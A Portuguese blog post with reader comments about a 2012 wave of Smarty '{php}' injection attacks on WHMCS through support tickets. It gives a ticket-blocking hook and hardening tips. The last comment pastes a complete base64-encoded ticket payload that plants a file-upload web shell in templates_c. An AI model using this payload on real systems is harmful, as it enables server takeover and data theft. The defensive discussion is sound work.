Onda de ataques ao WHMCS – o que fazer?

Escrito por Angélica Costa em 03/01/2012 | Categoria: WHMCS |

Desde o lançamento da versão 5, os usuários do WHMCS têm tido uma dor de cabeça com uma série de ataques e ameaças à segurança. Como o Edvan noticiou em seu blog, o Matt liberou uma atualização de segurança para corrigir uma falha que atinge todas as versões do sistema. Desde então tem sido um problema atrás do outro.

Ataques

Mesmo com o patch de segurança aplicado, algumas instalações – várias para ser precisa – foram vítimas do “ticket maldito”. O ticket geralmente contem um código iniciando com:

{php}eval(base64_decode(….

Quando se vai decodificar o código enviado, acaba-se percebendo que aponta para algum arquivo que tenta pegar seus dados. Algumas pessoas tiveram tudo apagado no WHMCS. Outros que guardavam informações de login de servidores, também tiveram problemas. Um amigo teve dois VPS zerados por causa de um mísero ticket.

A vulnerabilidade neste caso é culpa do Smarty – o sistema de templates usado pelo whmcs.

Proteja-se

Além das dicas básicas de segurança do WHMCS (mais abaixo), existem algumas coisas pra prevenir este problema específico.

- Aplique o patch e mantenha seu sistema sempre atualizado;

- O próprio Matt postou este código no Webhosting Talk:


<?php
$checkvars = array('subject','message');
foreach ($checkvars AS $checkvar) if (strpos($_REQUEST[$checkvar],'{php}')!==false) die("no thanks");
?>

Salve o código acima em um arquivo com qualquer nome, por exemplo smarty_ticket.php e envie para a pasta /inludes/hooks/ do seu whmcs. O que ele faz é detectar se algum ticket começa com a tag {php} e se começar, ela não processa a abertura do ticket (mas isso não garante que algum arquivo seja enviado).

Passos extras de seguranca

Se você ainda não fez os passos extras para um whmcs mais seguro… Abra o arquivo configuration.php :

- As pastas “attachments”, “downloads” and “templates_c” precisam ser acessíveis pelo whmcs e precisam de permissão 777. Quando pastas tem este tipo de permissão, é melhor que não fiquem acessíveis ao público. Mova estas pastas do /public_html/ para /home/usuario/ e informe o novo endereço no arquivo configuration.php (na raiz do whmcs):


$templates_compiledir = "/home/username/templates_c/";

$attachments_dir = "/home/username/attachments/";

$downloads_dir = "/home/username/downloads/";

- Você também pode alterar o nome da pasta de admin para qualquer outro como /backend, /eupresa (ehhehehe). Você também tem de informar a mudança no configuration.php:


$customadminpath = "meuadmin";

Lembre, pelamordedeus, se mudar o nome desta pasta, altere também tudo que tiver relação a ela, como o cron.

Backup sempre

Sempre tenha um backup atualizado da sua instalação do whmcs bem como de seus clientes.

Em tempo: O Edvan me mostrou um programa que circula na Internet, um executável que fica escaneando vulnerabilidades em uma instalação do WHMCS. Então, todo cuidado é pouco. A coisa está ficando séria.

Sobre Angélica Costa

Responsável pelo Portal do Host que é fruto da experiência de 6 anos no mercado de hospedagem.

Leia também:

WHMCS lança beta refresh 3O Edvan divulgou hoje em seu blog um vídeo com novos recursos da versão ...

Instalação do WHMCS: passo-a-passoEntão, você ouviu falar por aí que WHMCS é um dos melhores gerenciadores de ...

Média do tempo de resposta de tickets no WHMCSO painel de controle do MediaTemple, além de bonito, é bem bacana, mas interessante ...

Anônimo

Angel, isso é metade da história!

http://twitter.com/PainelWHMCS Painel WHMCS

Olha que legal!
WHMCS Totalmente de graça
Se eu fosse você não perderia essa!

Anônimo

Angel,

Dei uma melhorada no código do Matt:

Com isso ele irá banir o IP até 2020, risos

Não importa se ele utiliza proxy!

http://twitter.com/whmcsbr WHMCS.blog.br

Coloquei o código em
http://forum.portaldohost.com.br/threads/7212-Tentativa-de-invs%C3%A3o-no-meu-WHMCS?p=64952#post64952
Mayko Santos

Ola, sera que dava pra vc passar o link
do codigo com banimento de ip
… obrigado
whmcsblogbr

http://www.whmcs.blog.br/principal/seguranca-no-whmcs/
Carlos

Mayko, o próprio WHMCS tem a opção de você bloquear o ip por um certo tempo, nas configurações !!!
CONFIGURAR > IP´S BANIDOS

Marcos

Eu vi este programa por ai também.
Motivo está deixando o WHMCS, e contratando um sistema mais fechado que não de utilização do “povão” por ter um custo mais maior.

Melhor gastar agora, que sofrer depois.

Anônimo

Marcos,

Quem puder montar um sistema próprio é o ideal/recomendado! Terá falhas? Vulnerabilidades? Sofrerá ataques? Talvez.

Esse grave problema relatado neste post não “tem” a ver com WHMCS e sim com o smarty. Inclusive o HostBill sofreu o mesmo problema!
Marcos

O sistema que irei utilizar é o http://www.ubersmith.com.
Já estou fazendo testes dele em meu servidor, não há muita “baboseira” de personalizar. Sistema mais sério.

Dá para integrar os order forms com o site e ficar tranquilo, módulos de pagamentos são fáceis. Já que irei trabalhar somente com boleto direto e cartão crédito via Cielo.
Pelo menos é garantido, o sistema não é popular e não há quase nada sobre ele em foruns hackers.

Veja só os requerimentos básicos para instalação: http://www.ubersmith.com/de/requirements.php

Nele já poderei concentrar todos meus serviços, sem depender de terceiros ( solusvm para vps, por exemplo. )
Podemos dizer que o sistema é 101% mais seguro que o WHMCS. rs
Pode existir falhas sim, mas creio eu que nunca ocorra nada. Grandes data centers utilizam.
Anônimo

Marcos,
Garantido é um termo duvidoso para sistemas.

101% seguro não existe em nenhum sistema.

Nunca ocorra é pior ainda, não tem como garantir isso!

O WHMCS é utilizado em 97 países apesar dos pesares!
Marcos

Sim, sei que nenhum sistema é seguro.
Mais o informado acima, não é popular e há menos riscos de invasões.
Anônimo

Ok, Marcos! Cada um com sua visão/opinião.

Anônimo

foda viu… ja reclamei com a whmcs…. e eles sempre dizem que nao tem nada a ver com eles…. tive ate phishing em um pasta do whmcs de um cliente…. mandei para eles, e eles se esquivam

Anônimo

Julio,

O problema é que mesmo após a correção você pode está com algum arquivo possibilitado o phishing.

Minha sugestão é instalar/mover o WHMCS em uma pasta nova e certamente você não terá broncas!
Anônimo

Edvan sou eu ROMULO…kkkk
aconteceu mesmo com um de meus clientes isso…. nao comigo…
no entanto o caso do php estava ocorrendo sempre, postei ao Matt, e eles sempre se esquivando dizer nao ter nada a ver com eles….. e pedindo para verificar a segurança do servidor
Anônimo

Romulo, foi mal…

Tenha certeza que se o cliente aplicou o patch de segurança quando foi lançado não tem a ver com WHMCS.
Se ele demorou para aplicar certamente o arquivo estava no servidor a tempos!
Anônimo

hahaha eu achei que era a Angel….rsrs estamos quites!

Agora esse do php no ticket… ja bateu na minha porta…rs
Anônimo

Já recebi umas 100 ou mais!

Agora eu montei um script que bloqueia o IP do atacante.
Anônimo

Deixar tambem a opcao SOMENTE CLIENTE REGISTRADO pode abrir ticket, resolveu isto aqui pra mim tambem…. se querem abrir ticket que se registrem…rs
Anônimo

Romulo, se utilizar o script disponível aqui você não precisa se preocupar!
João Paulo

Recebi apenas um BadTicket e o cliente cadastrou com dados falsos, fiz os procedimentos acima incluindo a segurança extra, será que só isso basta?

Rogerio Sena

Urgente me ajudem!!! Minha versão é 5.0.3 será que corro risco? Já hackearam meu site 3 vezes no mesmo dia antes. Hoje tornaram enviar o ticket maldito “{php}evaL(base64_decode(‘DQpp…………….” será que conseguiram alguma coisa ou isso já foi resolvido na versão 5.0.3 ????

http://about.me/angelcosta Angélica Costa -Portal do host

@213436060ef32bc30c9106635e07bd3b:disqus se seu whmcs estiver atualizado (com o patch) não há muito o que temer, o ticket pode ser criado, mas não deve fazer bagunça – pelo menos foi o que nos disseram no whmcs.
Rogerio Sena

Eu não apliquei o patch, fiz foi baixar a versão 5.0.3. Está já vem com o Patch ?
http://about.me/angelcosta Angélica Costa -Portal do host

Sim, ela já está atualizada.
Marcos

Isso que a WHMCS diz para seus clientes, que se aplicou está tudo na “boa”.

Wilson

Olha ai pessoal: É assim que esses filhas da mãe estão agindo: http://www.youtube.com/watch?v=NZ0kncM5b34

Será que o pessoal da WHMCS não viu isso ainda?

Acompanhem o meu POST: http://forum.portaldohost.com.br/threads/7208-Arquivos-Injetados-depois-da-Invas%C3%A3o-no-WHMCS!
Anônimo

ISSO até dá medo…

Tenho recebido vários tickets destes.. neste momento tenho 3 deles aberto… tudo que faço é “block and delete”. A minha versão é 5.0.3.

Baixei o software que eles utilizam e fiz o scan numa versão de testes que tenho em algures e nada obtive… fiquei na dúvida e busquei por sites que rodam o WHMCS… e encontrei algumas informações sim. Já enviei emails as duas empresas onde encontrei relatando a falha e o post…

Outro cenário: Dias atrás recebi solicitação de atendimento via chat. E lá vinha um espertalhão dizendo que conseguia colocar o meu servidor em baixo em menos de 5 minutos. Tudo que fiz foi assegurar-me de que tudo estava actualizado e alterei todas as senhas… e desafiei o homem a por o servidor em baixo.

Aliás.. antes disso pedia uma especie de doação para que ele me passasse a solução…

e até hoje… o meu servidor nunca esteve em baixo.

é só para dizer que essa gente está dando medo!!!
http://complexoweb.com.br/ Helcio de Oliveira

Recebi um ticket desses ontem pela primeira vez e dei o “Block e Delete” tambem.

Acredito que não deu nada no sistema pois tambem uso a 5.0.3 e toda as medidas de segurança em relação as pastas e troca do nome da pasta admin foram feitas desde o inicio.

Mas confesso que deu medo quando vi aquilo no meu WHMCS rsrsrs.
http://twitter.com/PainelWHMCS Painel WHMCS

Olha que legal!
WHMCS Totalmente de graça
Se eu fosse você não perderia essa!
Rubens Kuhl

mod_security no Apache não seria uma opção ?
Carlos

Eu sofri este ataque ontem 04/03/2012 – o que me causou foi que acessando meu admin, a senha não funfava e travava bloquendo meu IP por um certo tempo (banido), não importava o quanto tempo passava, qualquer digitação que fizesse dava como meu IP Banifo. A minha salvação foi o backup que programei para fazer diario, pois deletei toda base de dados no Sql e restaurei novamente.
Peguei o ip do lazarento e coloquei em ips banidos e determinei até o ano de 2020. heheheheh
Mas mesmo assim apliquei as dicas aqui do forum !!!

Valeu pessoal continuem assim !!!
Marcelo

recebi um novo ticket, o que devo fazer?

Assunto:(‘JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbVZqYUc4Z0owRmlkU0EyWVV4aFRDQXZJRUUyYWtCb2IzUnRZV2xzTGtOdmJTQW5PdzBLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWRUZFdKdGFYUW5YU2twZXcwS0lDQWdJQ1JtYVd4bFpHbHlJRDBnSWlJN0lBMEtJQ0FnSUNSdFlYaG1hV3hsSUQwZ0p6SXdNREF3TURBbk93MEtEUW9nSUNBZ0pIVnpaWEptYVd4bFgyNWhiV1VnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTA3RFFvZ0lDQWdKSFZ6WlhKbWFXeGxYM1J0Y0NBOUlDUmZSa2xNUlZOYkoybHRZV2RsSjExYkozUnRjRjl1WVcxbEoxMDdEUW9nSUNBZ2FXWWdLR2x6YzJWMEtDUmZSa2xNUlZOYkoybHRZV2RsSjExYkoyNWhiV1VuWFNrcElIc05DaUFnSUNBZ0lDQWdKR0ZpYjJRZ1BTQWtabWxzWldScGNpNGtkWE5sY21acGJHVmZibUZ0WlRzTkNpQWdJQ0FnSUNBZ1FHMXZkbVZmZFhCc2IyRmtaV1JmWm1sc1pTZ2tkWE5sY21acGJHVmZkRzF3TENBa1lXSnZaQ2s3RFFvZ0lBMEtaV05vYnlJOFkyVnVkR1Z5UGp4aVBrUnZibVV1SVNFZ1BUMCtJQzhrZFhObGNtWnBiR1ZmYm1GdFpUd3ZZajQ4TDJObGJuUmxjajRpT3cwS2ZRMEtmUTBLWld4elpYc05DbVZqYUc4bkRRbzhabTl5YlNCdFpYUm9iMlE5SWxCUFUxUWlJR0ZqZEdsdmJqMGlJaUJsYm1OMGVYQmxQU0p0ZFd4MGFYQmhjblF2Wm05eWJTMWtZWFJoSWo0OGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpYVcxaFoyVWlQanhwYm5CMWRDQjBlWEJsUFNKVGRXSnRhWFFpSUEwS0RRcHVZVzFsUFNKVGRXSnRhWFFpSUhaaGJIVmxQU0pUZFdKdGFYUWlQand2Wm05eWJUNG5PdzBLZlEwS1B6ND0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ3RlbXBsYXRlc19jL214bS5waHAnLCd3Jyk7DQpmd3JpdGUoJGZpY2hpZXIsICRjKTsNCmZjbG9zZSgkZmljaGllcik7′)) ;{/php})